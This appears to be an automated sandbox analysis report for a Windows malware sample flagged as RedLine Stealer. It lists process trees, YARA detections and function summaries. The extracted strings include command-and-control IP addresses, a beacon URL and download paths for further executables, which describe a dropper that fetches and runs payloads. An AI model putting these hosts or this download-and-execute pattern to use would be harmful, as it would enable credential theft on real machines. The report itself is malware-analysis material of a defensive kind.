Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.2301916799.0000000005210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000002.2301916799.0000000005210000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.2301428924.0000000004C2A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	12:16:37
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:16:37
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	12:16:37
Start date:	25/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	12:16:38
Start date:	25/04/2024
Path:	C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\IIIJECAEGD.exe"
Imagebase:	0x10000
File size:	545'792 bytes
MD5 hash:	6C93FC68E2F01C20FB81AF24470B790C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 21%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	12:16:38
Start date:	25/04/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5408 -s 2364
Imagebase:	0x730000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	12:16:54
Start date:	25/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x240000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.2302571698.0000000000702000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000018.00000002.2302571698.0000000000702000.00000002.00000001.01000000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	5.9%
Dynamic/Decrypted Code Coverage:	2.5%
Signature Coverage:	13%
Total number of Nodes:	1105
Total number of Limit Nodes:	15

Executed Functions

Function 0042676C Relevance: 51.9, APIs: 16, Strings: 13, Instructions: 1148
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00426771
WSAStartup.WS2_32(00000202,?), ref: 004273FD
socket.WS2_32(00000002,00000001,00000006), ref: 00427413
WSACleanup.WS2_32 ref: 0042742D
gethostbyname.WS2_32(00000000), ref: 00427441
htons.WS2_32(?), ref: 00427473
connect.WS2_32(00000000,?,00000010), ref: 00427484
send.WS2_32(00000000,00000000,00000000,00000000), ref: 004274A7
send.WS2_32(00000000,00000000,?,00000000), ref: 004274C3
recv.WS2_32(00000000,00000000,00000001,00000000), ref: 00427503
recv.WS2_32(?,00000000,00000001,00000000), ref: 00427681
recv.WS2_32(?,?,00000000,00000000), ref: 00427720
recv.WS2_32(?,0000000A,00000002,00000000), ref: 00427747
recv.WS2_32(00000000,?,?,00000000), ref: 004277A8
WSACleanup.WS2_32 ref: 004277E6
closesocket.WS2_32(?), ref: 004277ED

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 , xrefs: 00426D1E, 00426FEC, 00427003
185.172.128.228, xrefs: 0042677C
Content-Length, xrefs: 00426853, 004268ED, 004275AB
GET , xrefs: 00426AF5, 00426B17, 00426B31
(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36, xrefs: 00427015, 0042729B, 004272B2
Host: , xrefs: 00426BF2, 00426C2C, 00426C43
/ping.php?substr=%s, xrefs: 0042677D
Transfer-Encoding, xrefs: 0042690B, 004269C9, 004275E7
HTTP/1.1, xrefs: 00426B5E, 00426BBC, 00426BD3
POST , xrefs: 00426AA7, 00426AD5, 00426B39
HTTP/1.1 200 OK, xrefs: 0042678D, 0042683A, 0042754B
User-Agent: , xrefs: 00426C73, 00426CF5, 00426D0C
chunked, xrefs: 004269E7, 00426A2D, 004275F8

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
String ID: HTTP/1.1$(KHTML, like Gecko) Chrome/122.0.6261.129 Safari/537.36$/ping.php?substr=%s$185.172.128.228$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
API String ID: 791229064-1542616328
Opcode ID: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
Instruction ID: 4e55451fc037eb126e07087a8435dc815b4e607a9865e0499e256671a6cdd487
Opcode Fuzzy Hash: 9d952c8ba9e130eda5d1cf078896611f00e5a5c92a92760575dbbb648ba0a804
Instruction Fuzzy Hash: F39287209062E19ACB02FFB56C5659E7FF4591530D714747FE690AF393CB2C86088B9E

Uniqueness

Uniqueness Score: -1.00%

Function 00424A0E Relevance: 48.6, APIs: 2, Strings: 25, Instructions: 1388
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004265BC: __EH_prolog.LIBCMT ref: 004265C1

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 00424AD4

Part of subcall function 0042604A: __EH_prolog.LIBCMT ref: 0042604F
Part of subcall function 0042604A: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131

Strings

SOFTWARE\BroomCleaner, xrefs: 004250F1, 004251E5
/BroomSetup.exe, xrefs: 00425DE7, 00425E8D, 00425EDB
185.172.128.228, xrefs: 004252C0, 00425366, 004254E5
185.172.128.203, xrefs: 004255F7, 0042569D, 0042583F
/ping.php?substr=%s, xrefs: 00425387, 0042545D, 00425475
Installed, xrefs: 004251FF, 0042525D
\run.exe, xrefs: 00425BD0, 00425C28
/syncUpd.exe, xrefs: 004256BC, 0042573E, 0042586F
P, xrefs: 00425B10
.exe, xrefs: 004258B1, 004258D3
/timeSync.exe, xrefs: 0042575F, 004257F2, 00425860
185.172.128.59, xrefs: 0042553C, 004255D6, 0042584D
note.padd.cn.com, xrefs: 00425942, 004259FA, 00425AFF
185.172.128.228, xrefs: 00425D21, 00425DCD, 00425ED2
/1/Package.zip, xrefs: 00425A14, 00425AAE, 00425B08
.zip, xrefs: 00425B5D, 00425B7F
P, xrefs: 00425855
sub=([\w-]{1,255}), xrefs: 00424AA2
.exe, xrefs: 00425F26, 00425F48
185.172.128.90, xrefs: 00424FB3, 0042504D, 0042509B
P, xrefs: 004250AB
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 00424DB6, 00424F4C, 00424F65
five, xrefs: 00424C22, 00424C49
P, xrefs: 00425EE3
P, xrefs: 004254F5

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: .exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$five$note.padd.cn.com$sub=([\w-]{1,255})
API String ID: 2531350358-1954608908
Opcode ID: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
Instruction ID: d125a89a0ba1aec4cd60c53361ca74c042bcd3054cac0714d62587379a507679
Opcode Fuzzy Hash: 9052fb54abde8957b0c8dcd2af763798e33b4e0189765b8ce0abbbbf1defcb6f
Instruction Fuzzy Hash: EFB2131050A2E19AC712FB7958567CA2FE49B62309F54687FE7D01F2A3CB78460C87DE

Uniqueness

Uniqueness Score: -1.00%

Function 0042628B Relevance: 12.3, APIs: 8, Instructions: 275
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 004262AD
CoCreateInstance.OLE32(00429220,00000000,00000001,00429210,?,?,?,?,?,?,?,?,?,?,?,/ping.php?substr=%s), ref: 004262C7
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 00426309
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426311
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 00426338
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 0042634E
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00426355
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00000000,?), ref: 0042637A

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString$CreateInitializeInstance
String ID:
API String ID: 3070066007-0
Opcode ID: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
Instruction ID: 83f5cca910cad30c2957a1169f386ac85e7f4b82ddc6b65933772462ec616701
Opcode Fuzzy Hash: ce133915acab1118794e9b5cd677c6d3f7326e3d37cb49b767c5506a71b1f5aa
Instruction Fuzzy Hash: 3A914B75A00218AFDB04DFA8D888AEEBBB9FF49314F544559F805EB241D776AC02CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004139E7 Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00438DB0,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
ExitProcess.KERNEL32 ref: 00413A21

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction ID: 8e17948dea93fcc861bafccf52e4138581932e64e8d8508709b4de54f2ab24c4
Opcode Fuzzy Hash: 89ebcf6bc015773511dc3aad9cd82e24c556da80457bd1d22a03e0f024b4907b
Instruction Fuzzy Hash: 83E0B631100108ABCF21AF65DD09A993B69EF54786F444029F9869A232DB39EE92CA48

Uniqueness

Uniqueness Score: -1.00%

Function 008F02FE Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008F0326
Module32First.KERNEL32(00000000,00000224), ref: 008F0346

Memory Dump Source

Source File: 00000000.00000002.1965167409.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, Offset: 008EF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ef000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 7a073493cd379fe7301dc26e8cb153198d19622a944e0f4313f8f417ae9885c9
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: D2F062325007196FD7202AB9988DABEB6E8FF49725F100529E742D11C1DB70EC458A61

Uniqueness

Uniqueness Score: -1.00%

Function 0041A242 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00419F10: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

GetLastError.KERNEL32 ref: 0041A356
__dosmaperr.LIBCMT ref: 0041A35D
GetFileType.KERNEL32(00000000), ref: 0041A369
GetLastError.KERNEL32 ref: 0041A373
__dosmaperr.LIBCMT ref: 0041A37C
CloseHandle.KERNEL32(00000000), ref: 0041A39C
CloseHandle.KERNEL32(?), ref: 0041A4E6
GetLastError.KERNEL32 ref: 0041A518
__dosmaperr.LIBCMT ref: 0041A51F

Strings

H, xrefs: 0041A4A4

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 975f7ae23b976af0f57ba7f63c5262953fac7c3e1b8646b278d3dfb303d0f39f
Instruction ID: 6253cfc56dbab61e205766efb0611ca8061eb8c5ebbdbf8fd01913e42387971c
Opcode Fuzzy Hash: 975f7ae23b976af0f57ba7f63c5262953fac7c3e1b8646b278d3dfb303d0f39f
Instruction Fuzzy Hash: A4A13632A041089FDF199F78D8517EE7BA1AB06324F14019EEC15EB391D7398DA2C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004192AD Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e76cb713194fa4f728ec747c36cb0267ce7d8b1f5e695f35cd7f37fd194786d6
Instruction ID: c4abe014ee414803f6a4a6dca87339887fd42b2314c6943b79fa01ee0dc397dc
Opcode Fuzzy Hash: e76cb713194fa4f728ec747c36cb0267ce7d8b1f5e695f35cd7f37fd194786d6
Instruction Fuzzy Hash: 1CC13AB1E04249AFDB11CFA9C850BEE7BB1BF09314F04019AE954A7392C7389DC1CB69

Uniqueness

Uniqueness Score: -1.00%

Function 024E003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 024E024D

Strings

kernel32.dll, xrefs: 024E008F, 024E0095
cess, xrefs: 024E018D

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 0783c2768731fe3e8d9e8d57ada001befee56267019b85a16529305c8023ab95
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 76527A74A00229DFDB64CF58C984BADBBB1BF09305F1480DAE55EAB351DB70AA85CF14

Uniqueness

Uniqueness Score: -1.00%

Function 0042615A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0042615F
RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 00426187
RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 0042620A
RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042622B

Strings

Installed, xrefs: 00426169, 00426197, 004261B6, 004261B7
SOFTWARE\BroomCleaner, xrefs: 00426167, 0042617A

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction ID: 7631ba6f6479b49e2955b4a66f7b67ea7b8ea0f8d2650bf46820f955d15f7583
Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction Fuzzy Hash: F3319A71A00129EEDF149FA8DC94AFEBB78EB08348F44016EE80277281C7B11D05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00426510 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExA.SHELL32(?,.exe), ref: 00426552
WaitForSingleObject.KERNEL32(?,00008000), ref: 00426566
CloseHandle.KERNEL32(?), ref: 0042656F

Strings

.exe, xrefs: 0042651B

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: .exe
API String ID: 3837156514-4119554291
Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction ID: 8ce7cd6e21d80bec1428d2ca161df36b0ad46b5534dc267783c352d5b9ba18c9
Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction Fuzzy Hash: 1B015A31E00218ABDF15DFA9E8459DDBBB8FF08340F418126F801A6260EB709A45CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00426242 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,0042590D,00000001,?,/ping.php?substr=%s), ref: 0042625D
WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 00426275
FindCloseChangeNotification.KERNEL32(00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 0042627E

Strings

.exe, xrefs: 00426247

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID: .exe
API String ID: 3805958096-4119554291
Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction ID: 1160b3d028a4f0b3eb39880a7a2cc02b481a356c14d22bba427b687e2e61c155
Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction Fuzzy Hash: 19E06D72701224BBD7311B9AAC48FABBE6CEF86AA4F040165FB05D2110A6A1DC0197B8

Uniqueness

Uniqueness Score: -1.00%

Function 004163FD Relevance: 4.6, APIs: 3, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 00416453
GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 0041645D
__dosmaperr.LIBCMT ref: 00416488

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
Instruction ID: 375721714d43bc4782e6a43c23cd9332c59ec42f2299351a345cb8f3503d09eb
Opcode Fuzzy Hash: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
Instruction Fuzzy Hash: EA014E3360412016D6256635E8457FF67599B82738F2B017FFD188B2D2EB6CDCC2819D

Uniqueness

Uniqueness Score: -1.00%

Function 00419767 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
__dosmaperr.LIBCMT ref: 004197B1

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: dad49dafcb6aaf0294d2e2872a6b63d175876bddee0454d410784651848899ac
Instruction ID: ffc3df5eb890e326191760c687c06a6ec256fa7eb9c4ce0b7ceac38b7dc3edc6
Opcode Fuzzy Hash: dad49dafcb6aaf0294d2e2872a6b63d175876bddee0454d410784651848899ac
Instruction Fuzzy Hash: 70012D36620119ABCB159F59DC059EE7B29DF85330B28024AFC219B2D0E6749C918798

Uniqueness

Uniqueness Score: -1.00%

Function 004264F9 Relevance: 4.5, APIs: 3, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(?), ref: 00426502
SysFreeString.OLEAUT32(?), ref: 00426507
CoUninitialize.OLE32 ref: 00426509

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: FreeString$Uninitialize
String ID:
API String ID: 1985688103-0
Opcode ID: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
Instruction ID: 20283bebf02f6add892787a5acbccff6c180d450b55e9b59979360a618d6bcd4
Opcode Fuzzy Hash: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
Instruction Fuzzy Hash: A6B09230D02029ABEF22AB62EE0D45C7F32FF40350F410061F405332308B351D22EE88

Uniqueness

Uniqueness Score: -1.00%

Function 00419CC3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

Strings

@, xrefs: 00419D84

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: CreateFile
String ID: @
API String ID: 823142352-2766056989
Opcode ID: 19ae29186eb238c1cffb342219aeaf7137875d95b9a5eb57b690caaf41f6485a
Instruction ID: 6e2d9e324c610adb1979779f65b1bd98f37231a06814a81205b09b8777469d26
Opcode Fuzzy Hash: 19ae29186eb238c1cffb342219aeaf7137875d95b9a5eb57b690caaf41f6485a
Instruction Fuzzy Hash: 4D61E671900209AAEF259E28ECA1BFF3659DB01324F280667F914D63E1D37DCDD1C299

Uniqueness

Uniqueness Score: -1.00%

Function 00401BB2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081

Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

v*@, xrefs: 00401BD0

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
String ID: v*@
API String ID: 3966877926-3062513736
Opcode ID: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
Instruction ID: cee5f8951f4aa60660b8f0772aceb561b5f660f34992c4678438f01180239965
Opcode Fuzzy Hash: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
Instruction Fuzzy Hash: FC218EB1611106AFD708DF59C849A6AB7F9FF48348F14822EE116A7341C7B8DD008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042604A Relevance: 3.1, APIs: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042604F

Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 420165198-0
Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction ID: 115bff912634c1bae9a386948b342ebf01da51d0a41a8c3d45e1fed53d0017c0
